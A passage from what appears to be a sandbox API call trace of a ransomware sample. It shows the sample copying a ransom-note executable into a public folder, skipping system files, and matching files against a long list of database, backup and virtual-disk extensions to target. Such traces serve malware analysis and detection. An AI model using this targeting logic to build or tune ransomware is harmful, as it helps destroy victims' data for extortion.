cAlternateFileName="")) returned 1 [0039.594] lstrcmpiW (lpString1="Public", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.594] lstrcmpiW (lpString1="Public", lpString2="aoldtz.exe") returned 1 [0039.594] lstrcmpiW (lpString1="Public", lpString2=".") returned 1 [0039.594] lstrcmpiW (lpString1="Public", lpString2="..") returned 1 [0039.594] lstrcmpiW (lpString1="Public", lpString2="windows") returned -1 [0039.594] lstrcmpiW (lpString1="Public", lpString2="bootmgr") returned 1 [0039.594] lstrcmpiW (lpString1="Public", lpString2="temp") returned -1 [0039.594] lstrcmpiW (lpString1="Public", lpString2="pagefile.sys") returned 1 [0039.595] lstrcmpiW (lpString1="Public", lpString2="boot") returned 1 [0039.595] lstrcmpiW (lpString1="Public", lpString2="ids.txt") returned 1 [0039.595] lstrcmpiW (lpString1="Public", lpString2="ntuser.dat") returned 1 [0039.595] lstrcmpiW (lpString1="Public", lpString2="perflogs") returned 1 [0039.595] lstrcmpiW (lpString1="Public", lpString2="MSBuild") returned 1 [0039.595] lstrlenW (lpString="Public") returned 6 [0039.595] lstrlenW (lpString="C:\\Users\\desktop.ini") returned 20 [0039.595] lstrcpyW (in: lpString1=0x2cce412, lpString2="Public" | out: lpString1="Public") returned="Public" [0039.595] SetFileAttributesW (lpFileName="C:\\Users\\Public", dwFileAttributes=0x10) returned 1 [0039.595] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0039.595] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2c9488 [0039.595] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0039.595] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0039.595] FindClose (in: hFindFile=0x2c9b10 | out: hFindFile=0x2c9b10) returned 1 [0039.595] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bb0 [0039.595] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Public", iMaxLength=260 | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0039.595] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c9488 | out: hHeap=0x2b0000) returned 1 [0039.595] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0039.595] lstrlenW (lpString="C:\\Users\\Public") returned 15 [0039.595] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0039.595] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0039.595] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\how to back your files.exe"), bFailIfExists=1) returned 0 [0039.596] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0039.596] GetLastError () returned 0x0 [0039.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0039.596] ReadFile (in: hFile=0xfc, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0039.596] CloseHandle (hObject=0xfc) returned 1 [0039.596] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0039.596] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0039.596] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49484f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49484f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2c9b10 [0039.596] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.596] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0039.596] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0039.596] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49484f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49484f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.596] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.596] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0039.596] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0039.596] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0039.596] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0039.596] lstrcmpiW (lpString1="Desktop", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.596] lstrcmpiW (lpString1="Desktop", lpString2="aoldtz.exe") returned 1 [0039.597] lstrcmpiW (lpString1="Desktop", lpString2=".") returned 1 [0039.597] lstrcmpiW (lpString1="Desktop", lpString2="..") returned 1 [0039.597] lstrcmpiW (lpString1="Desktop", lpString2="windows") returned -1 [0039.597] lstrcmpiW (lpString1="Desktop", lpString2="bootmgr") returned 1 [0039.597] lstrcmpiW (lpString1="Desktop", lpString2="temp") returned -1 [0039.597] lstrcmpiW (lpString1="Desktop", lpString2="pagefile.sys") returned -1 [0039.597] lstrcmpiW (lpString1="Desktop", lpString2="boot") returned 1 [0039.597] lstrcmpiW (lpString1="Desktop", lpString2="ids.txt") returned -1 [0039.597] lstrcmpiW (lpString1="Desktop", lpString2="ntuser.dat") returned -1 [0039.597] lstrcmpiW (lpString1="Desktop", lpString2="perflogs") returned -1 [0039.597] lstrcmpiW (lpString1="Desktop", lpString2="MSBuild") returned -1 [0039.597] lstrlenW (lpString="Desktop") returned 7 [0039.597] lstrlenW (lpString="C:\\Users\\Public\\*") returned 17 [0039.597] lstrcpyW (in: lpString1=0x2cce420, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0039.597] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0039.597] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x30) returned 0x2ed058 [0039.597] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0039.597] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0039.597] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.597] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0039.597] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0039.597] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0039.597] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0039.597] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0039.597] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0039.597] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0039.597] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0039.597] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0039.597] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0039.597] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0039.597] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0039.597] lstrlenW (lpString="desktop.ini") returned 11 [0039.597] lstrlenW (lpString="C:\\Users\\Public\\Desktop") returned 23 [0039.597] lstrcpyW (in: lpString1=0x2cce420, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0039.597] lstrlenW (lpString="desktop.ini") returned 11 [0039.597] lstrlenW (lpString="Ares865") returned 7 [0039.597] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0039.598] lstrlenW (lpString=".dll") returned 4 [0039.598] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0039.598] lstrlenW (lpString=".lnk") returned 4 [0039.598] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0039.598] lstrlenW (lpString=".ini") returned 4 [0039.598] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0039.598] lstrlenW (lpString=".sys") returned 4 [0039.598] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0039.598] lstrlenW (lpString="desktop.ini") returned 11 [0039.598] lstrlenW (lpString="bak") returned 3 [0039.598] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0039.598] lstrlenW (lpString="ba_") returned 3 [0039.598] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0039.598] lstrlenW (lpString="dbb") returned 3 [0039.598] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0039.598] lstrlenW (lpString="vmdk") returned 4 [0039.598] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0039.598] lstrlenW (lpString="rar") returned 3 [0039.598] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0039.598] lstrlenW (lpString="zip") returned 3 [0039.598] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0039.598] lstrlenW (lpString="tgz") returned 3 [0039.598] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0039.598] lstrlenW (lpString="vbox") returned 4 [0039.598] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0039.598] lstrlenW (lpString="vdi") returned 3 [0039.598] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0039.598] lstrlenW (lpString="vhd") returned 3 [0039.598] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0039.598] lstrlenW (lpString="vhdx") returned 4 [0039.598] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0039.598] lstrlenW (lpString="avhd") returned 4 [0039.598] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0039.598] lstrlenW (lpString="db") returned 2 [0039.598] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0039.598] lstrlenW (lpString="db2") returned 3 [0039.599] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0039.599] lstrlenW (lpString="db3") returned 3 [0039.599] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0039.599] lstrlenW (lpString="dbf") returned 3 [0039.599] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0039.599] lstrlenW (lpString="mdf") returned 3 [0039.599] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0039.599] lstrlenW (lpString="mdb") returned 3 [0039.599] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0039.599] lstrlenW (lpString="sql") returned 3 [0039.599] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0039.599] lstrlenW (lpString="sqlite") returned 6 [0039.599] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0039.599] lstrlenW (lpString="sqlite3") returned 7 [0039.599] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0039.599] lstrlenW (lpString="sqlitedb") returned 8 [0039.599] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0039.599] lstrlenW (lpString="xml") returned 3 [0039.599] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0039.599] lstrlenW (lpString="$er") returned 3 [0039.599] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0039.599] lstrlenW (lpString="4dd") returned 3 [0039.599] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0039.599] lstrlenW (lpString="4dl") returned 3 [0039.599] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0039.599] lstrlenW (lpString="^^^") returned 3 [0039.599] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0039.599] lstrlenW (lpString="abs") returned 3 [0039.599] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0039.599] lstrlenW (lpString="abx") returned 3 [0039.599] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0039.599] lstrlenW (lpString="accdb") returned 5 [0039.599] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0039.599] lstrlenW (lpString="accdc") returned 5 [0039.599] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0039.599] lstrlenW (lpString="accde") returned 5 [0039.599] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0039.600] lstrlenW (lpString="accdr") returned 5 [0039.600] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0039.600] lstrlenW (lpString="accdt") returned 5 [0039.600] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0039.600] lstrlenW (lpString="accdw") returned 5 [0039.600] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0039.600] lstrlenW (lpString="accft") returned 5 [0039.600] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0039.600] lstrlenW (lpString="adb") returned 3 [0039.600] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.600] lstrlenW (lpString="adb") returned 3 [0039.600] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.600] lstrlenW (lpString="ade") returned 3 [0039.600] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0039.600] lstrlenW (lpString="adf") returned 3 [0039.600] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0039.600] lstrlenW (lpString="adn") returned 3 [0039.600] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0039.600] lstrlenW (lpString="adp") returned 3 [0039.600] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0039.600] lstrlenW (lpString="alf") returned 3 [0039.600] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0039.600] lstrlenW (lpString="ask") returned 3 [0039.600] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0039.600] lstrlenW (lpString="btr") returned 3 [0039.600] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0039.600] lstrlenW (lpString="cat") returned 3 [0039.600] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0039.600] lstrlenW (lpString="cdb") returned 3 [0039.600] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0039.600] lstrlenW (lpString="ckp") returned 3 [0039.600] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0039.600] lstrlenW (lpString="cma") returned 3 [0039.600] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0039.600] lstrlenW (lpString="cpd") returned 3 [0039.600] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0039.600] lstrlenW (lpString="dacpac") returned 6 [0039.600] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0039.601] lstrlenW (lpString="dad") returned 3 [0039.601] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0039.601] lstrlenW (lpString="dadiagrams") returned 10 [0039.601] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0039.601] lstrlenW (lpString="daschema") returned 8 [0039.601] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0039.601] lstrlenW (lpString="db-journal") returned 10 [0039.601] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0039.601] lstrlenW (lpString="db-shm") returned 6 [0039.601] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0039.601] lstrlenW (lpString="db-wal") returned 6 [0039.601] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0039.601] lstrlenW (lpString="dbc") returned 3 [0039.601] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0039.601] lstrlenW (lpString="dbs") returned 3 [0039.601] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0039.601] lstrlenW (lpString="dbt") returned 3 [0039.601] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0039.601] lstrlenW (lpString="dbv") returned 3 [0039.601] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0039.601] lstrlenW (lpString="dbx") returned 3 [0039.601] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0039.601] lstrlenW (lpString="dcb") returned 3 [0039.601] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0039.601] lstrlenW (lpString="dct") returned 3 [0039.601] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0039.601] lstrlenW (lpString="dcx") returned 3 [0039.601] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0039.601] lstrlenW (lpString="ddl") returned 3 [0039.601] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0039.601] lstrlenW (lpString="dlis") returned 4 [0039.601] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0039.601] lstrlenW (lpString="dp1") returned 3 [0039.601] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0039.601] lstrlenW (lpString="dqy") returned 3 [0039.601] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0039.601] lstrlenW (lpString="dsk") returned 3 [0039.601] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0039.601] lstrlenW (lpString="dsn") returned 3 [0039.602] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0039.602] lstrlenW (lpString="dtsx") returned 4 [0039.602] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0039.602] lstrlenW (lpString="dxl") returned 3 [0039.602] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0039.602] lstrlenW (lpString="eco") returned 3 [0039.602] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0039.602] lstrlenW (lpString="ecx") returned 3 [0039.602] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0039.602] lstrlenW (lpString="edb") returned 3 [0039.602] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0039.602] lstrlenW (lpString="epim") returned 4 [0039.602] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0039.602] lstrlenW (lpString="fcd") returned 3 [0039.602] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0039.602] lstrlenW (lpString="fdb") returned 3 [0039.602] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0039.602] lstrlenW (lpString="fic") returned 3 [0039.602] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0039.602] lstrlenW (lpString="flexolibrary") returned 12 [0039.602] lstrlenW (lpString="fm5") returned 3 [0039.602] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0039.602] lstrlenW (lpString="fmp") returned 3 [0039.602] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0039.602] lstrlenW (lpString="fmp12") returned 5 [0039.602] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0039.602] lstrlenW (lpString="fmpsl") returned 5 [0039.602] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0039.602] lstrlenW (lpString="fol") returned 3 [0039.603] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0039.603] lstrlenW (lpString="fp3") returned 3 [0039.603] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0039.603] lstrlenW (lpString="fp4") returned 3 [0039.603] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0039.603] lstrlenW (lpString="fp5") returned 3 [0039.603] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0039.603] lstrlenW (lpString="fp7") returned 3 [0039.603] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0039.603] lstrlenW (lpString="fpt") returned 3 [0039.603] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0039.603] lstrlenW (lpString="frm") returned 3 [0039.603] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0039.603] lstrlenW (lpString="gdb") returned 3 [0039.603] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.603] lstrlenW (lpString="gdb") returned 3 [0039.603] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.603] lstrlenW (lpString="grdb") returned 4 [0039.603] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0039.603] lstrlenW (lpString="gwi") returned 3 [0039.603] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0039.603] lstrlenW (lpString="hdb") returned 3 [0039.603] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0039.603] lstrlenW (lpString="his") returned 3 [0039.603] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0039.603] lstrlenW (lpString="ib") returned 2 [0039.603] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0039.603] lstrlenW (lpString="idb") returned 3 [0039.603] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0039.603] lstrlenW (lpString="ihx") returned 3 [0039.603] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0039.603] lstrlenW (lpString="itdb") returned 4 [0039.603] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0039.603] lstrlenW (lpString="itw") returned 3 [0039.603] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0039.603] lstrlenW (lpString="jet") returned 3 [0039.603] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0039.604] lstrlenW (lpString="jtx") returned 3 [0039.604] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0039.604] lstrlenW (lpString="kdb") returned 3 [0039.604] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0039.604] lstrlenW (lpString="kexi") returned 4 [0039.604] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0039.604] lstrlenW (lpString="kexic") returned 5 [0039.604] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0039.604] lstrlenW (lpString="kexis") returned 5 [0039.604] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0039.604] lstrlenW (lpString="lgc") returned 3 [0039.604] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0039.604] lstrlenW (lpString="lwx") returned 3 [0039.604] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0039.604] lstrlenW (lpString="maf") returned 3 [0039.604] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0039.604] lstrlenW (lpString="maq") returned 3 [0039.604] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0039.604] lstrlenW (lpString="mar") returned 3 [0039.604] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0039.604] lstrlenW (lpString="marshal") returned 7 [0039.604] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0039.604] lstrlenW (lpString="mas") returned 3 [0039.604] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0039.604] lstrlenW (lpString="mav") returned 3 [0039.604] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0039.604] lstrlenW (lpString="maw") returned 3 [0039.604] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0039.604] lstrlenW (lpString="mdbhtml") returned 7 [0039.604] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0039.604] lstrlenW (lpString="mdn") returned 3 [0039.604] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0039.604] lstrlenW (lpString="mdt") returned 3 [0039.604] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0039.604] lstrlenW (lpString="mfd") returned 3 [0039.604] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0039.604] lstrlenW (lpString="mpd") returned 3 [0039.604] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0039.604] lstrlenW (lpString="mrg") returned 3 [0039.605] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0039.605] lstrlenW (lpString="mud") returned 3 [0039.605] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0039.605] lstrlenW (lpString="mwb") returned 3 [0039.605] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0039.605] lstrlenW (lpString="myd") returned 3 [0039.605] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0039.605] lstrlenW (lpString="ndf") returned 3 [0039.605] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0039.605] lstrlenW (lpString="nnt") returned 3 [0039.605] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0039.605] lstrlenW (lpString="nrmlib") returned 6 [0039.605] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0039.605] lstrlenW (lpString="ns2") returned 3 [0039.605] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0039.605] lstrlenW (lpString="ns3") returned 3 [0039.605] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0039.605] lstrlenW (lpString="ns4") returned 3 [0039.605] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0039.605] lstrlenW (lpString="nsf") returned 3 [0039.605] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0039.605] lstrlenW (lpString="nv") returned 2 [0039.605] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0039.605] lstrlenW (lpString="nv2") returned 3 [0039.605] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0039.605] lstrlenW (lpString="nwdb") returned 4 [0039.605] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0039.605] lstrlenW (lpString="nyf") returned 3 [0039.605] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0039.605] lstrlenW (lpString="odb") returned 3 [0039.605] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.605] lstrlenW (lpString="odb") returned 3 [0039.605] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.605] lstrlenW (lpString="oqy") returned 3 [0039.605] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0039.605] lstrlenW (lpString="ora") returned 3 [0039.605] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0039.605] lstrlenW (lpString="orx") returned 3 [0039.606] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0039.606] lstrlenW (lpString="owc") returned 3 